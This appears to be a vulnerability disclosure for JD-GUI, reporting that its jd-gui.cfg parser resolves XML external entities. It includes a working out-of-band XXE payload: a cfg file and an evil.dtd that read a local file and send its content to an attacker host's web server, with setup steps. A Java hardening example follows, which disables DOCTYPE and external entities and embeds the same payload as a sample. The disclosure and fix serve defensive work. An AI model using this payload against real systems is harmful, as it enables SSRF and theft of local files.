This is not a critical security issue in my opinion as it is quite a contrived scenario. Just observed the behaviour and wanted to have it out of my mind.
The way the jd-gui.cfg file is parsed allows SSRF or file disclosure attacks, because XML external entities are processed.
The main issues are:
When parsing jd-gui.cfg files, it follows external entities.
The current working directory is used to locate jd-gui.cfg on *nix-based systems.
Attack idea
Place a jd-gui.cfg file in the directory that holds the .jar files being opened, to trigger the vulnerability.
Attack Setup
Follow the steps below, all within the same directory:
echo -n testcontent > test   # file to be extracted
Create the following jd-gui.cfg file:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM
"file:///<path/to/current_working_dir>/test">
<!ENTITY % dtd SYSTEM
"http://<attacker-host>:8000/evil.dtd">
%dtd;
]>
<data>&send;</data>
Replace <attacker-host> with your attacking host, and <path/to/current_working_dir> with your current working directory.
Create the evil.dtd file:
<!ENTITY % all "<!ENTITY send SYSTEM 'http://<attacker-host>:8000/?collect=%file;'>">
%all;
Replace <attacker-host> again with your host machine.
Start a Python web server: python3 -m http.server
Last step: start jd-gui, e.g. java -jar ~/Downloads/jd-gui.jar
XXE leads to SSRF/File Disclosure
Some Notes:
Recommendations
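As an added example under this heading (not jd-gui's own code), here is how a Java config loader can be hardened against the payload above: the constructed SafeConfigParser class parses the report's jd-gui.cfg with DOCTYPE declarations and external entities disabled, so the file:// and http:// references are never resolved. The class name, the parseConfig method and the embedded sample are assumptions made for the example.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.SAXParseException;

public class SafeConfigParser {
  // Constructed sample: the jd-gui.cfg payload from this report, placeholders kept verbatim.
  static final String XXE_CONFIG =
      "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n"
      + "<!DOCTYPE data [\n"
      + "<!ENTITY % file SYSTEM \"file:///<path/to/current_working_dir>/test\">\n"
      + "<!ENTITY % dtd SYSTEM \"http://<attacker-host>:8000/evil.dtd\">\n"
      + "%dtd;\n"
      + "]>\n"
      + "<data>&send;</data>\n";

  // Parse a jd-gui.cfg with a builder that can neither fetch DTDs nor resolve external
  // entities. Returns true if the document parsed, false if the parser rejected it.
  static boolean parseConfig(String xml) throws Exception {
    DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
    dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
    // A config file has no legitimate need for a DOCTYPE: reject one outright.
    dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    // Defence in depth, should DOCTYPEs ever be allowed again.
    dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
    dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
    dbf.setXIncludeAware(false);
    dbf.setExpandEntityReferences(false);
    try {
      Document doc = dbf.newDocumentBuilder()
          .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.ISO_8859_1)));
      return doc.getDocumentElement() != null;
    } catch (SAXParseException e) {
      // The DOCTYPE is refused before any file:// or http:// URL inside it is touched.
      System.err.println("Rejected jd-gui.cfg: " + e.getMessage());
      return false;
    }
  }

  public static void main(String[] args) throws Exception {
    System.out.println("XXE payload accepted? " + parseConfig(XXE_CONFIG));
    System.out.println("Plain config accepted? " + parseConfig("<data/>"));
  }
}
```

The same feature settings apply to SAXParserFactory and XMLInputFactory if the config is read through a different JAXP API.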